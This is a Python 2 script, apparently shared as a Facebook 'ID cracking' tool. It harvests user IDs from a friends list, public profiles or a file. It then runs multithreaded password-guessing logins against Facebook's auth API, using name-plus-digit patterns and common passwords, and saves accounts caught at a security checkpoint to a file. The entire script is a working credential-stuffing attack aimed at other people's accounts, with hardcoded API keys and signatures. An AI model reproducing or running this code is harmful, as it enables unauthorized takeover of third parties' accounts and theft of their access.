# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, cookielib, uuid
from multiprocessing.pool import ThreadPool
try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')

try:
    import bs4
except ImportError:
    os.system('pip2 install bs4')

try:
    import requests
except ImportError:
    os.system('pip2 install requests')
    os.system('python2 Crack.py')

from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]

def keluar():
    print '[!] Exit'
    os.sys.exit()


def acak(x):
    w = 'mhkbpcP'
    d = ''
    for i in x:
        d += '!' + w[random.randint(0, len(w) - 1)] + i

    return cetak(d)


def cetak(x):
    w = 'mhkbpcP'
    for i in w:
        j = w.index(i)
        x = x.replace('!%s' % i, '%s;' % str(31 + j))

    x += ''
    x = x.replace('!0', '')
    sys.stdout.write(x + '\n')


def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.06)



def tik():
    titik = [
     '.   ', '..  ', '... ']
    for o in titik:
        print '\r\x1b[1;97m[\x1b[1;93m\xe2\x98\x85\x1b[1;97m]\x1b[1;93m Entering Please Wait Moment\x1b[1;97m ' + o,
        sys.stdout.flush()
        time.sleep(1)


back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
cpe = []
id = []
username = []
idteman = []
idfromteman = []
gagal = []
reaksi = []
komen = []
vulnot = 'Not Vuln'
vuln = 'Vuln'
os.system("clear")
os.system('lolcat calar.py')
print
count=0
while count <9999999:
	   username = raw_input('\033[1;95mEnter username:\033[1;96m  ')
	   print
	   password = raw_input('\033[1;95mEnter password:\033[1;96m  ')
	   if password=='4b1r' and username=='ABIRHOSSAIN':
	       print('Access granted')
	       break
	   else:
   	    print('\033[1;94m Access denied. Try again.')
   	    count += 1
   	    print("			\033[1;91mFor User & Password Contact With Owner")
   	    os.system("xdg-open https://facebook.com/Abir-Hossain-104247341997068/?substory_index=0")
def masuk():
    os.system('clear')
    os.system("lolcat calar.py")
    print '\033[1;91m[\033[1;93m01\033[1;91m] \033[1;96mLogin With ID / PASSWORD'    
    print '\033[1;91m[\033[1;93m02\033[1;91m] \033[1;96mLogin With Token Facebook'
    print '\033[1;91m[\033[1;93m00\033[1;91m] \033[1;96mBack'
    pilih_masuk()


def pilih_masuk():
    print''
    msuk = raw_input('\x1b[1;92mSelect One \x1b[91m:\x1b[1;95m ')
    if msuk == '':
        print ' Fill Correctly !'
        pilih_masuk()
    elif msuk == '1' or msuk == '01':
        login()
    elif msuk == '2' or msuk == '02':
        tokenz()
    elif msuk == '0' or msuk == '00':
        keluar()
    else:
        print 'Fill Correctly !'
        pilih_masuk()


def login():
    os.system('clear')
    try:
        toket = open('login.txt', 'r')
        menu()
    except (KeyError, IOError):
        os.system('clear')
        os.system("lolcat calar.py")
        print '\033[1;94mLOGIN WITH FACEBOOK ACCOUNT '
        print''
        id = raw_input(' \x1b[1;96mID / Email =\x1b[1;93m ')
        print''
        pwd = raw_input('\x1b[1;96m Password =\x1b[1;95m ')
        try:
            br.open('https://m.facebook.com')
        except mechanize.URLError:
            print '\n[!] There is no connection'
            keluar()

        br._factory.is_html = True
        br.select_form(nr=0)
        br.form['email'] = id
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
        if 'save-device' in url:
            try:
                sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
                x = hashlib.new('md5')
                x.update(sig)
                a = x.hexdigest()
                data.update({'sig': a})
                url = 'https://api.facebook.com/restserver.php'
                r = requests.get(url, params=data)
                z = json.loads(r.text)
                unikers = open('login.txt', 'w')
                unikers.write(z['access_token'])
                unikers.close()
                print '\n\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m]\x1b[1;92m Login Successful'
                os.system('xdg-open https://facebook.com/Abir-Hossain-104247341997068/?substory_index=0')
                bot_komen()
            except requests.exceptions.ConnectionError:
                print '\n[!] There is no connection'
                keluar()

        if 'checkpoint' in url:
            print '\x1b[1;91myour account is Checkpoint'
            os.system('rm -rf login.txt')
            time.sleep(1)
            keluar()
        else:
            print '\x1b[1;92m Password / Email Wrong'
            os.system('rm -rf login.txt')
            time.sleep(1)
            masuk()


def tokenz():
    os.system('clear')
    os.system("lolcat calar.py")
    try:
        toket = open('login.txt', 'r')
        menu()    
    except:
    	toket = raw_input('\x1b[1;93m[\x1b[1;94m√\x1b[1;93m] \x1b[1;92mToken : \x1b[1;96m')
    	try:
    	   otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
    	   a = json.loads(otw.text)
    	   nama = a['name']
    	   zedd = open('login.txt', 'w')
    	   zedd.write(toket)
    	   zedd.close()
    	   print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m]\x1b[1;92m Login Successful'
    	   os.system('xdg-open https://facebook.com/Abir-Hossain-104247341997068/?substory_index=0')
    	   bot_komen()
    	except KeyError:
    	   print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m] \x1b[1;91mToken Wrong !'
    	   time.sleep(1)
    	   masuk()


def bot_komen():
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;94m[!] Token invalid'
        os.system('rm -rf login.txt')
    menu()

def menu():
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        os.system('clear')
        os.system('rm -rf login.txt')
        masuk()

    try:
        otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
        a = json.loads(otw.text)
        nama = a['name']
        id = a['id']
    except KeyError:
        os.system('clear')
        print '\x1b[1;94m[!] \x1b[1;91mToken invalid'
        os.system('rm -rf login.txt')
        time.sleep(1)
        masuk()
    except requests.exceptions.ConnectionError:
        print '[!] There is no connection'
        keluar()

    os.system('clear')
    os.system("lolcat calar.py")
    print '\x1b[1;93mName Account  :\x1b[1;95m ' + nama
    print '\x1b[1;93mID         :\x1b[1;95m' + id
    print''
    print '\x1b[1;93m[\x1b[1;94m01\x1b[1;93m] \x1b[1;92mCrack ID '
    print '\x1b[1;93m[\x1b[1;94m00\x1b[1;93m] \x1b[1;92mBack'
    print''
    print '\x1b[1;96m========================================='
    pilih()


def pilih():
    print''
    unikers = raw_input('\x1b[1;31mSelect Option :\x1b[1;93m ')
    if unikers == '':
        print '\x1b[1;97mFill Correctly !'
        pilih()
    elif unikers == '1' or unikers == '01':
        indo()
    elif unikers == '0' or unikers == '00':
        os.system('clear')
        jalan('Delete tokens')
        os.system('rm -rf login.txt')
        keluar()
    else:
        print '\x1b[1;97mFill Correctly !'
        pilih()


def indo():
    global toket
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;95m[!] \x1b[1;91mToken invalid'
        os.system('rm -rf login.txt')
        time.sleep(1)
        keluar()

    os.system('clear')
    os.system("lolcat calar.py")
    print '\x1b[1;91m[\x1b[1;92m1\x1b[1;91m] \x1b[1;96mCrack From Friends List '
    print '\x1b[1;91m[\x1b[1;92m2\x1b[1;91m]\x1b[1;96m Crack From Public ID  '
    print '\x1b[1;91m[\x1b[1;92m3\x1b[1;91m] \x1b[1;96mCrack From File   '
    print '\x1b[1;91m[\x1b[1;92m0\x1b[1;91m] \x1b[1;96mBack          '
    pilih_indo()


def pilih_indo():
    global cekpoint
    global oks
    teak = raw_input('\x1b[1;94mSelect Option :\x1b[1;93m ')
    if teak == '':
        print '\x1b[1;94m[\x1b[1;95m!\x1b[1;94m]\x1b[1;94m Fill Correctly !'
        pilih_indo()
    else:
        if teak == '1' or teak == '01':
            os.system('clear')
            os.system("lolcat calar.py")
            print '========================================='
            r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
            z = json.loads(r.text)
            for s in z['data']:
                id.append(s['id'])

        elif teak == '2' or teak == '02':
            os.system('clear')
            os.system("lolcat calar.py")
            amount=input('\033[1;92mENTER FRIEND ID AMOUNT : \033[1;97m')
            for i in range(amount):
                print ''
                idt = raw_input('\x1b[1;93m[\x1b[1;91m√\x1b[1;93m]\x1b[1;96m ID :\x1b[1;95m ')
                try:
                    jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
                    op = json.loads(jok.text)
                    print '\033[1;93m[\033[1;91m√\033[1;93m] \033[1;97mName :\x1b[1;92m ' + op['name']
                except KeyError:
                    print '\x1b[1;97mMissing friend ID !'
                    raw_input('\n[ Back ]')
                    indo()
                except requests.exceptions.ConnectionError:
                    print '[!] There is no connection !'
                    keluar()
 
                r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
                z = json.loads(r.text)
                for i in z['data']:
                    id.append(i['id'])

        elif teak == '3' or teak == '03':
            os.system('clear')
            os.system("lolcat calar.py")
            try:
                idlist = raw_input('\x1b[1;91mFile Name :\x1b[1;93m ')
                for line in open(idlist, 'r').readlines():
                    id.append(line.strip())

            except KeyError:
                print '\x1b[1;97m[!] File does not exist ! '
                raw_input('\n\x1b[1;92m[ \x1b[1;97mBack \x1b[1;92m]')
            except IOError:
                print '\x1b[1;97m[!] File does not exist!'
                raw_input('\n\x1b[1;92m[ \x1b[1;97mBack \x1b[1;92m]')
                indo()

        elif teak == '0' or teak == '00':
            menu()
        else:
            print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Fill Correctly !'
            pilih_indo()
        print '\033[1;93m[\033[1;91m√\033[1;93m] \033[1;94mTotal ID :\x1b[1;93m ' + str(len(id))
        print '\033[1;93m[\033[1;91m√\033[1;93m] \033[1;92mPlease wait, process is running ...'
        print '\033[1;93m[\033[1;91m√\033[1;93m] \033[1;95mAbir Hossain Friend list Cracking tool ...'
        print '\033[1;93m[\033[1;91m√\033[1;93m] \033[1;91mFor stop this process press ctrl+z '
        print '\x1b[1;91m========================================='
    def main(arg):
        user = arg
        try:
            os.mkdir('out')
        except OSError:
            pass

        try:
            a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
            c = json.loads(a.text)
            pass1 = c['first_name'] + '123'
            data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
            w = json.load(data)
            if 'access_token' in w:
                x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                z = json.loads(x.text)
                print '\x1c\x1b[1;33m[\xe2\x9c\x94] \x1c\x1b[1;33m[SUCCESSFULL]'
                print '\x1c\x1b[1;33m[\xe2\x9e\xb9] \x1c\x1b[1;33mID \x1c\x1b[1;33m      : \x1c\x1b[1;33m' + user
                print '\x1c\x1b[1;33m[\xe2\x9e\xb9] \x1c\x1b[1;33mPassword \x1c\x1b[1;33m: \x1c\x1b[1;33m' + pass1 + '\n'
                oks.append(user + pass1)
            elif 'www.facebook.com' in w['error_msg']:
                print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass1
                cek = open('out/ABIR-CP.txt', 'a')
                cek.write(user + '|' + pass1 + '\n')
                cek.close()
                cekpoint.append(user + pass1)
            else:
                pass2 = c['first_name'] + '1234'
                data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                w = json.load(data)
                if 'access_token' in w:
                    x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                    z = json.loads(x.text)
                    print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '                    
                    print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;91mID \x1c\x1b[1;91m      : \x1c\x1b[1;92m' + user
                    print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;91mPassword \x1c\x1b[1;91m: \x1c\x1b[1;92m' + pass2 + '\n'
                    
                    oks.append(user + pass2)
                elif 'www.facebook.com' in w['error_msg']:
                    print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass2
                    cek = open('out/ABIR-CP.txt', 'a')
                    cek.write(user + '|' + pass2 + '\n')
                    cek.close()
                    cekpoint.append(user + pass2)
                else:
                    pass3 = c['first_name'] + '12345'
                    data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                    w = json.load(data)
                    if 'access_token' in w:
                        x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                        z = json.loads(x.text)
                        print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '                      
                        print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;91mID \x1c\x1b[1;91m      : \x1c\x1b[1;92m' + user
                        print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;91mPassword \x1c\x1b[1;91m: \x1c\x1b[1;92m' + pass3 + '\n'
                        
                        oks.append(user + pass3)
                    elif 'www.facebook.com' in w['error_msg']:
                        print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass3
                        cek = open('out/ABIR-CP.txt', 'a')
                        cek.write(user + '|' + pass3 + '\n')
                        cek.close()
                        cekpoint.append(user + pass3)
                    else:
                        pass4 = c['last_name'] + '123'
                        data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                        w = json.load(data)
                        if 'access_token' in w:
                            x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                            z = json.loads(x.text)
                            print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '                            
                            print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;91mID \x1c\x1b[1;91m      : \x1c\x1b[1;92m' + user
                            print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mPassword \x1c\x1b[1;94m: \x1c\x1b[1;95m' + pass4 + '\n'
                            
                            oks.append(user + pass4)
                        elif 'www.facebook.com' in w['error_msg']:
                            print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass4
                            cek = open('out/ABIR-CP.txt', 'a')
                            cek.write(user + '|' + pass4 + '\n')
                            cek.close()
                            cekpoint.append(user + pass4)
                        else:
                            pass5 = c['last_name'] + '1234'
                            data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                            w = json.load(data)
                            if 'access_token' in w:
                                x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                                z = json.loads(x.text)
                                print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '                                
                                print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;91mID \x1c\x1b[1;91m      : \x1c\x1b[1;92m' + user
                                print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mPassword \x1c\x1b[1;94m: \x1c\x1b[1;95m' + pass5 + '\n'
                                
                                oks.append(user + pass5)
                            elif 'www.facebook.com' in w['error_msg']:
                                print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass5
                                cek = open('out/ABIR-CP.txt', 'a')
                                cek.write(user + '|' + pass5 + '\n')
                                cek.close()
                                cekpoint.append(user + pass5)
                            else:
                                pass6 = c['last_name'] + '12345'
                                data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                w = json.load(data)
                                if 'access_token' in w:
                                    x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                                    z = json.loads(x.text)
                                    print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '                                 
                                    print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;91mID \x1c\x1b[1;91m      : \x1c\x1b[1;92m' + user
                                    print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mPassword \x1c\x1b[1;94m: \x1c\x1b[1;95m' + pass6 + '\n'
                                    
                                    oks.append(user + pass6)
                                elif 'www.facebook.com' in w['error_msg']:
                                    print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass6
                                    cek = open('out/ABIR-CP.txt', 'a')
                                    cek.write(user + '|' + pass6 + '\n')
                                    cek.close()
                                    cekpoint.append(user + pass6)
                                else:
                                    pass7 = '786786'
                                    data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass7 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                    w = json.load(data)
                                    if 'access_token' in w:
                                        x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                                        z = json.loads(x.text)
                                        print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '                                        
                                        print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mID \x1c\x1b[1;94m      : \x1c\x1b[1;95m' + user
                                        print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mPassword \x1c\x1b[1;94m: \x1c\x1b[1;95m' + pass7 + '\n'                                        
                                        oks.append(user + pass7)
                                    elif 'www.facebook.com' in w['error_msg']:
                                        print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass7
                                        cek = open('out/ABIR-CP.txt', 'a')
                                        cek.write(user + '|' + pass7 + '\n')
                                        cek.close()
                                        cekpoint.append(user + pass7)
                                    else:
                                        pass8 = 'Pakistan123'
                                        data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                        w = json.load(data)
                                        if 'access_token' in w:
                                            x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                                            z = json.loads(x.text)
                                            print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '                                           
                                            print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mID \x1c\x1b[1;94m      : \x1c\x1b[1;95m' + user
                                            print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mPassword \x1c\x1b[1;94m: \x1c\x1b[1;95m' + pass8 + '\n'
                                            
                                            oks.append(user + pass8)
                                        elif 'www.facebook.com' in w['error_msg']:
                                            print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass8
                                            cek = open('out/ABIR-CP.txt', 'a')
                                            cek.write(user + '|' + pass8 + '\n')
                                            cek.close()
                                            cekpoint.append(user + pass8)
                                        else:
                                            pass9 = '102030'
                                            data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                            w = json.load(data)
                                            if 'access_token' in w:
                                                x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                                                z = json.loads(x.text)
                                                print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '                                             
                                                print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mID \x1c\x1b[1;94m      : \x1c\x1b[1;95m' + user
                                                print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mPassword \x1c\x1b[1;94m: \x1c\x1b[1;95m' + pass9 + '\n'                                                
                                                oks.append(user + pass9)
                                            elif 'www.facebook.com' in w['error_msg']:
                                                print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass9
                                                cek = open('out/ABIR-CP.txt', 'a')
                                                cek.write(user + '|' + pass9 + '\n')
                                                cek.close()
                                                cekpoint.append(user + pass9)
                                            else:
                                                pass10 = '778899'
                                                data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass10 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                                w = json.load(data)
                                                if 'access_token' in w:
                                                    x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                                                    z = json.loads(x.text)
                                                    print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '
                                                    print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mID \x1c\x1b[1;94m      : \x1c\x1b[1;95m' + user
                                                    print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mPassword \x1c\x1b[1;94m: \x1c\x1b[1;95m' + pass10 + '\n'
                                                    
                                                    oks.append(user + pass10)
                                                elif 'www.facebook.com' in w['error_msg']:
                                                    print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass10
                                                    cek = open('out/ABIR-CP.txt', 'a')
                                                    cek.write(user + '|' + pass10 + '\n')
                                                    cek.close()
                                                    cekpoint.append(user + pass10)
                                                else:
                                                    pass11 = 'Bangladesh'
                                                    data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass11 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                                    w = json.load(data)
                                                    if 'access_token' in w:
                                                        x = requests.get('https://graph.facebook.com/' + user + '?access_token=' + w['access_token'])
                                                        z = json.loads(x.text)
                                                        print 'x1cx1b[1;94m[xe2x9cx94] x1cx1b[1;92m[SUCCESSFULL] '                                                       
                                                        print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mID \x1c\x1b[1;94m      : \x1c\x1b[1;95m' + user
                                                        print '\x1c\x1b[1;94m[\xe2\x9e\xb9] \x1c\x1b[1;94mPassword \x1c\x1b[1;94m: \x1c\x1b[1;95m' + pass11 + '\n'
                                                        
                                                        oks.append(user + pass11)
                                                    elif 'www.facebook.com' in w['error_msg']:
                                                        print"\033[1;91m[\033[1;96mCHEKPOINT\033[1;91m] \033[1;94m"+user+"\033[1;95m <==> \033[1;93m"+pass11
                                                        cek = open('out/ABIR-CP.txt', 'a')
                                                        cek.write(user + '|' + pass11 + '\n')
                                                        cek.close()
                                                        cekpoint.append(user + pass11)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print '\033[1;93m[\033[1;91m√\033[1;93m] \033[1;92mProcess Has Been Completed ....'
    print '\033[1;93m[\033[1;91m√\033[1;93m] \033[1;92mTotal OK/CP : '+str(len(oks))+'/'+str(len(cekpoint))
    print('\033[1;93m[\033[1;91m√\033[1;93m] \033[1;96mCP File Has Been Saved : out/ABIR-CP.txt')
    raw_input('\033[1;93mPress Enter To Go Back]')
    indo()
if __name__ == '__main__':
    masuk()